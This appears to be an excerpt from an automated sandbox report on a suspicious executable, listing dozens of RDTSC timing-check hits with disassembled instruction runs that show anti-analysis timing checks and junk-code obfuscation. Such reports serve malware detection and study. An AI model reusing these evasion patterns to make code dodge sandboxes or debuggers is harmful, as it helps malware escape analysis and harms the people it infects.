Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A1B6E3 second address: A1B6E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A1DD94 second address: A1DD99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A1DD99 second address: A1DD9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A1DD9E second address: A1DDA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A1DDA4 second address: A1DDCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push edx 0x0000000d pop edx 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FA3D4C68E67h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A1DEB1 second address: A1DEB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A1DEB5 second address: A1DEC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A1DEC3 second address: A1DEE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FA3D4D82106h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA3D4D82112h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A1DEE2 second address: A1DEF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push esi 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A1DEF1 second address: A1DF49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a jno 00007FA3D4D82121h 0x00000010 pop eax 0x00000011 jp 00007FA3D4D82109h 0x00000017 movzx edi, cx 0x0000001a lea ebx, dword ptr [ebp+1244FBBCh] 0x00000020 jmp 00007FA3D4D8210Eh 0x00000025 xchg eax, ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 jbe 00007FA3D4D8210Ch 0x0000002e jc 00007FA3D4D82106h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A1E17D second address: A1E181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A3EA92 second address: A3EAAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4D8210Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A3CBB2 second address: A3CBD1 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA3D4C68E5Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA3D4C68E5Ah 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A3D02B second address: A3D031 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A3D154 second address: A3D162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jng 00007FA3D4C68E56h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A3D162 second address: A3D16F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 ja 00007FA3D4D82106h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A3D16F second address: A3D196 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA3D4C68E5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA3D4C68E65h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A3D196 second address: A3D19A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A3D435 second address: A3D445 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA3D4C68E62h 0x00000008 jo 00007FA3D4C68E56h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A3D6F0 second address: A3D6F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A3D83A second address: A3D84F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop ebx 0x0000000b jl 00007FA3D4C68E5Eh 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A3DB55 second address: A3DB5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A3DB5E second address: A3DB64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A3DB64 second address: A3DB68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A3DB68 second address: A3DB81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4C68E65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A3DB81 second address: A3DB8E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jo 00007FA3D4D82106h 0x00000009 pop ebx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A3DB8E second address: A3DB96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A35EF6 second address: A35F04 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FA3D4D82106h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A0B16A second address: A0B170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A0B170 second address: A0B17A instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA3D4D82106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A0B17A second address: A0B1A7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 js 00007FA3D4C68E56h 0x0000000b pop edx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jns 00007FA3D4C68E58h 0x00000015 jo 00007FA3D4C68E5Eh 0x0000001b jng 00007FA3D4C68E56h 0x00000021 push edx 0x00000022 pop edx 0x00000023 jl 00007FA3D4C68E5Ch 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A3E214 second address: A3E21A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A3E21A second address: A3E227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A3E4C2 second address: A3E4D2 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA3D4D82106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A3E4D2 second address: A3E4E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA3D4C68E61h 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A3E4E8 second address: A3E504 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA3D4D82118h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A3E8D1 second address: A3E8D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A3E8D5 second address: A3E8F1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA3D4D82116h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A45807 second address: A45811 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA3D4C68E5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A100AD second address: A100B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A49DBE second address: A49DC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A49F03 second address: A49F1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA3D4D82115h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A4A368 second address: A4A36C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A4A4FE second address: A4A502 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A4B64F second address: A4B653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A4B773 second address: A4B77D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FA3D4D82106h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A4B96E second address: A4B972 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A4BB61 second address: A4BB67 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A4BB67 second address: A4BB6C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A4BB6C second address: A4BB7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A4BFD8 second address: A4BFDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A4BFDE second address: A4BFE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A4BFE2 second address: A4BFEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A4C166 second address: A4C16A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A4DB49 second address: A4DB5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FA3D4C68E5Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A4E1CC second address: A4E1D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A4E1D0 second address: A4E1D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A4EBAD second address: A4EBCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp], eax 0x0000000b mov edi, 0BC96DC4h 0x00000010 push 00000000h 0x00000012 mov edi, esi 0x00000014 push 00000000h 0x00000016 mov edi, dword ptr [ebp+122D2CDBh] 0x0000001c push eax 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A4FB37 second address: A4FBB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FA3D4C68E58h 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e xor di, E347h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007FA3D4C68E58h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 00000018h 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D3913h], edi 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ebx 0x0000003a call 00007FA3D4C68E58h 0x0000003f pop ebx 0x00000040 mov dword ptr [esp+04h], ebx 0x00000044 add dword ptr [esp+04h], 00000018h 0x0000004c inc ebx 0x0000004d push ebx 0x0000004e ret 0x0000004f pop ebx 0x00000050 ret 0x00000051 mov esi, dword ptr [ebp+122D2858h] 0x00000057 push eax 0x00000058 jbe 00007FA3D4C68E7Ch 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007FA3D4C68E5Fh 0x00000065 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A50666 second address: A506B6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA3D4D82106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b nop 0x0000000c clc 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007FA3D4D82108h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b jmp 00007FA3D4D8210Ah 0x00000030 push eax 0x00000031 pushad 0x00000032 pushad 0x00000033 jnc 00007FA3D4D82106h 0x00000039 pushad 0x0000003a popad 0x0000003b popad 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A506B6 second address: A506BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A5685C second address: A56871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA3D4D8210Eh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A150EB second address: A15117 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA3D4C68E68h 0x00000008 jnc 00007FA3D4C68E56h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 pop eax 0x00000019 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A52529 second address: A52541 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4D82114h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A53B5A second address: A53B5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A15117 second address: A1511B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A52541 second address: A5254B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FA3D4C68E56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A1511B second address: A15123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A5A4BF second address: A5A4C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A5BAA4 second address: A5BABB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA3D4D82108h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007FA3D4D82106h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A5BABB second address: A5BAC5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA3D4C68E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A5AC34 second address: A5AC3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A5AC3A second address: A5AC42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A5C95E second address: A5C963 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A5C963 second address: A5C9FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4C68E66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007FA3D4C68E58h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov edi, dword ptr [ebp+124631BCh] 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push esi 0x00000031 call 00007FA3D4C68E58h 0x00000036 pop esi 0x00000037 mov dword ptr [esp+04h], esi 0x0000003b add dword ptr [esp+04h], 0000001Dh 0x00000043 inc esi 0x00000044 push esi 0x00000045 ret 0x00000046 pop esi 0x00000047 ret 0x00000048 mov dword ptr [ebp+122D222Eh], ebx 0x0000004e call 00007FA3D4C68E61h 0x00000053 and edi, dword ptr [ebp+122D3226h] 0x00000059 pop ebx 0x0000005a push 00000000h 0x0000005c adc di, B700h 0x00000061 xchg eax, esi 0x00000062 pushad 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A5BCB0 second address: A5BCB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A5C9FA second address: A5CA00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A5BCB4 second address: A5BCBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A5CA00 second address: A5CA13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007FA3D4C68E58h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A5BCBD second address: A5BCC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A5D882 second address: A5D887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A5DA53 second address: A5DA58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A5DA58 second address: A5DA6E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jno 00007FA3D4C68E56h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jl 00007FA3D4C68E5Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A5F9EE second address: A5F9F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A5F9F2 second address: A5F9F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A5F9F8 second address: A5F9FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A5F9FE second address: A5FA0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A5FA0C second address: A5FA12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A5FA12 second address: A5FA17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
